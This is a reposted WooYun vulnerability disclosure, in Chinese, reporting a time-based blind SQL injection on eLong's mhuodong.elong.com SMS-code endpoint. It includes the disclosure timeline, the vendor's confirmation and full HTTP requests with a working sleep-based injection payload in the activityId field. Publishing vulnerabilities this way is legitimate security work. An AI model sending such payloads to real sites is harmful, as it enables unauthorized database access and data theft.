艺龙旅行某站存在SQL注入

admin 2017年5月7日06:43:58评论527 views字数 2811阅读9分22秒阅读模式
摘要

2016-03-14: 细节已通知厂商并且等待厂商处理中
2016-03-16: 厂商已经确认,细节仅向厂商公开
2016-03-26: 细节向核心白帽子及相关领域专家公开
2016-04-05: 细节向普通白帽子公开
2016-04-15: 细节向实习白帽子公开
2016-04-30: 细节向公众公开

漏洞概要 关注数(4) 关注此漏洞

缺陷编号: WooYun-2016-184706

漏洞标题: 艺龙旅行某站存在SQL注入

相关厂商: 艺龙旅行网

漏洞作者: 路人甲

提交时间: 2016-03-14 21:24

公开时间: 2016-04-30 14:01

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: SQL注入

1人收藏

漏洞详情

披露状态:

2016-03-14: 细节已通知厂商并且等待厂商处理中
2016-03-16: 厂商已经确认,细节仅向厂商公开
2016-03-26: 细节向核心白帽子及相关领域专家公开
2016-04-05: 细节向普通白帽子公开
2016-04-15: 细节向实习白帽子公开
2016-04-30: 细节向公众公开

简要描述:

详细说明:

目标:mhuodong.elong.com

检测发现以下地方存在SQL注入:(时间盲注)

code 区域
POST http://mhuodong.elong.com/PromotionJson/GetSmsCode HTTP/1.1
 Host: mhuodong.elong.com
 Connection: keep-alive
 Content-Length: 107
 Accept: */*
 Origin: http://mhuodong.elong.com
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
 Content-Type: application/x-www-form-urlencoded
 DNT: 1
 Referer: http://mhuodong.elong.com/giftbag/index?activityId=65698945-4ed7-4e70-9078-fae5a80c78fe&dref=syhbtp_hq
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN
 Cookie: H5SessionId=7fe7517f-8f59-4ce1-b7d1-429e41e03ac6; H5Channel=ewhtml5%2cDefault; H5CookieId_s=d534b935-0651-444a-b5e8-83bc9137be3c; H5CookieId=d534b935-0651-444a-b5e8-83bc9137be3c; route=8a0c2bb2bd2a2dcd9e688c2ec698fa76; NSC_NCBQQEXOME_80=ffffffffaf1d076d45525d5f4f58455e445a4a4229a0; Hm_lvt_a6bc45911d1a6843649fb7ba8676cc71=1457956757; Hm_lpvt_a6bc45911d1a6843649fb7ba8676cc71=1457956757; Hm_lvt_2547ead1439a4e1d06c7eb9e330939fd=1457956757; Hm_lpvt_2547ead1439a4e1d06c7eb9e330939fd=1457956757
 
 activityId=1&mobile=13888888888&gCode=

Payload:(延时4秒)

code 区域
POST http://mhuodong.elong.com/PromotionJson/GetSmsCode HTTP/1.1
 Host: mhuodong.elong.com
 Connection: keep-alive
 Content-Length: 173
 Accept: */*
 Origin: http://mhuodong.elong.com
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
 Content-Type: application/x-www-form-urlencoded
 DNT: 1
 Referer: http://mhuodong.elong.com/giftbag/index?activityId=65698945-4ed7-4e70-9078-fae5a80c78fe&dref=syhbtp_hq
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN
 Cookie: H5SessionId=7fe7517f-8f59-4ce1-b7d1-429e41e03ac6; H5Channel=ewhtml5%2cDefault; H5CookieId_s=d534b935-0651-444a-b5e8-83bc9137be3c; H5CookieId=d534b935-0651-444a-b5e8-83bc9137be3c; route=8a0c2bb2bd2a2dcd9e688c2ec698fa76; NSC_NCBQQEXOME_80=ffffffffaf1d076d45525d5f4f58455e445a4a4229a0; Hm_lvt_a6bc45911d1a6843649fb7ba8676cc71=1457956757; Hm_lpvt_a6bc45911d1a6843649fb7ba8676cc71=1457956757; Hm_lvt_2547ead1439a4e1d06c7eb9e330939fd=1457956757; Hm_lpvt_2547ead1439a4e1d06c7eb9e330939fd=1457956757
 
 activityId=if(now()%3dsysdate()%2csleep(2)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(2)%2c0))OR'XOR(if(now()%3dsysdate()%2csleep(2)%2c0))OR%22*/&mobile=13888888888&gCode=

漏洞证明:

跑出当前数据库

艺龙旅行某站存在SQL注入

修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-03-16 14:01

厂商回复:

感谢白帽子,已验证

最新状态:

暂无


 

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

 

登陆后才能进行评分


评价

  1. 2016-03-14 21:38 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

    1

    哎哟。。又是。。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月7日06:43:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   艺龙旅行某站存在SQL注入http://cn-sec.com/archives/44398.html

发表评论

匿名网友 填写信息